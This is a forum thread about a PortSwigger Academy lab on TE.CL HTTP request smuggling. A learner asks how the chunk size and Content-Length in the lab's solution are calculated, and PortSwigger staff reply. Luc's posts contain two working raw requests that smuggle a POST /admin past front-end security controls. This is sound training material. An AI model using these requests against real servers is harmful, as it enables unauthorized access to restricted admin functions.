Burp Suite User Forum

Create new post

Lab: Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability

Luc | Last updated: Oct 05, 2020 03:06PM UTC

Good morning, The following request in the provided solution did work for me but I don't understand how it's calculated. POST / HTTP/1.1 Host: aca11fb21f25e1e3803a19b400f90012.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 60 POST /admin HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0 \r\n \r\n Those two ending "\r\n" and the correct length "60" are required, or else I got "Read timeout after 10000ms". My question is how is the number 60 is calculated. It's supposed to be the body content length of the smuggled request. Why is it not 22(first line) + 49(second line) + 20(third line) + 2(fourth blank line) + 5(line of "x=1") + 1 (number 0 without trailing \r\n) = 99? POST /admin HTTP/1.1 -> 20 characters + 2 ending \r\n (22 characters) Content-Type: application/x-www-form-urlencoded -> 47 characters + 2 ending \r\n (49 characters) Content-Length: 15 -> 18 characters + 2 ending \r\n (20 characters) -> \r\n (2 characters) x=1 -> 3 + \r\n (5 characters) 0 -> 1 + \r\n (3 characters) \r\n -> \r\n (2 characters) \r\n -> \r\n (2 characters) And I don't understand how "Content-Length" 15" is calculated. I thought it shall be x=1\r\n (5 characters) + 0 (1 character) = 6 characters. Would you please help to explain why my calculations are wrong? Thanks in advance for your help. Regards, Luc

Uthman, PortSwigger Agent | Last updated: Oct 05, 2020 04:02PM UTC

Hi Luc, Thanks for your query. Unfortunately, we are unable to provide personal support or tutoring to Academy users, as we prefer to improve the experience for our entire userbase by focussing on expanding and refining our public content. The post will remain up so anyone in the community is free to reply. Have you taken a look at the learning materials and James' research on the topic? - https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn - https://portswigger.net/web-security/request-smuggling

Luc | Last updated: Oct 05, 2020 05:06PM UTC

Yes, I'm seen both learning materials and that is the reason I'm interested in this area and want to explorer more. Those two links don't help with this specific question. I would greatly appreciate if you or another user can help to answer the question since it sounds straightforward but I just don't get it.

Luc | Last updated: Oct 05, 2020 05:17PM UTC

Sorry I miss something. Chunk size is in bytes (expressed in hexadecimal) so 60 actually means 96. So it's 22(first line) + 49(second line) + 20(third line) + 2(fourth blank line) + 3(line of "x=1" without ending \r\n). However, I still don't understand why the smuggled request has a length 15 instead of 6. Could someone help to explain? Thanks.

Luc | Last updated: Oct 05, 2020 05:40PM UTC

Hi Uthman, The second content-length doesn't matter thus it doesn't seem to be calculated correctly. The following request got the same expected result: POST / HTTP/1.1 Host: ac641f531f428c008065478d00f200ed.web-security-academy.net Content-length: 4 Transfer-Encoding: chunked 5f POST /admin HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 6 x=1 0 \r\n \r\n As we can tell, I can change the content-length from 15 to 6. Shall the example be updated to have a content-length of 6 instead of 15 to reduce confusion to all users? Please advise. Thanks, Luc

Sergey | Last updated: Aug 16, 2022 11:48AM UTC

Thanks to Luc for raising the question! Actually, it seems nowhere in the course material present the explanation about how to calculate these numbers or which tool inside Burp Suite could help to calculate them.

Michelle, PortSwigger Agent | Last updated: Aug 17, 2022 02:48PM UTC

The content-length is the length of the body, when calculating this, you might find it useful to display non-printable characters as they will be included in the count. When you select any text, the Inspector panel will also give you the count for what you have selected. I hope this helps.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.